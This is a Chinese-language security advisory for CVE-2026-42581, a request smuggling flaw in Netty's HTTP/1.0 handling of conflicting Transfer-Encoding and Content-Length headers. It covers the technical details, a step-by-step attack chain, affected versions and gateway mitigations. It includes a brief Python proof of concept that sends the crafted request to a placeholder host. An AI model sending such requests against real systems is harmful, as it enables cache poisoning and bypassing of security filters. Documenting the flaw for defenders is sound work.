IPBUF安全漏洞报告
English
CVE-2026-42581 CVSS 5.8 中危

CVE-2026-42581 Netty HTTP请求走私漏洞

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42581
漏洞类型
HTTP请求走私
CVSS评分
5.8 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Netty

相关标签

HTTP请求走私NettyCVE-2026-42581协议解析错误

漏洞概述

Netty框架在处理HTTP/1.0请求时存在逻辑缺陷。当请求同时包含Transfer-Encoding和Content-Length头时,Netty未像处理HTTP/1.1那样移除冲突的Content-Length头。这导致前端按Chunked解析,后端若信任Content-Length则解析不一致,从而引发HTTP请求走私漏洞,攻击者可借此绕过安全检查。

技术细节

该漏洞源于Netty的HttpObjectDecoder对HTTP/1.0协议的处理不当。在HTTP/1.1中,若同时存在Transfer-Encoding: chunked和Content-Length,Netty会删除Content-Length;但在HTTP/1.0中,此保护机制缺失。攻击者发送HTTP/1.0请求,利用Netty保留Content-Length但按Chunked解码body的特性,造成请求体解析边界与下游后端服务器不一致。这种解析差异允许攻击者将恶意请求“走私”到后续请求中,可能导致缓存投毒、绕过WAF防护或未经授权的访问敏感数据。

攻击链分析

STEP 1
识别目标
攻击者识别出使用受影响版本Netty作为中间件的应用程序。
STEP 2
构造恶意请求
攻击者构造一个HTTP/1.0请求,该请求同时包含Transfer-Encoding: chunked和Content-Length两个头部字段。
STEP 3
发送请求
将构造好的请求发送给Netty服务器。
STEP 4
解析差异触发
Netty作为前端服务器,按照Transfer-Encoding解析请求体(分块),但在转发给后端的HttpMessage中保留了Content-Length头。
STEP 5
请求走私
后端服务器如果优先信任Content-Length,将按照不同的边界解析请求,导致攻击者精心构造的数据被当作下一个请求处理,从而实现请求走私。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket # Target host and port host = 'target.example.com' port = 80 # Malicious HTTP/1.0 request with both Transfer-Encoding and Content-Length # Netty will decode as chunked but forward Content-Length payload = ( "POST / HTTP/1.0\r\n" "Host: {}\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Transfer-Encoding: chunked\r\n" "Content-Length: 10\r\n" "Connection: keep-alive\r\n" "\r\n" "5\r\n" "Hello\r\n" "0\r\n" "\r\n" ).format(host) def send_request(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(payload.encode()) response = s.recv(4096) print(response.decode()) s.close() if __name__ == "__main__": send_request()

影响范围

Netty 4.1.x < 4.1.133.Final
Netty 4.2.x < 4.2.13.Final

防御指南

临时缓解措施
建议在无法立即升级补丁的情况下,在网络网关或WAF处配置规则,拒绝接收HTTP/1.0版本的请求,或者检测并拦截同时包含Transfer-Encoding和Content-Length头的请求,以消除解析差异带来的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表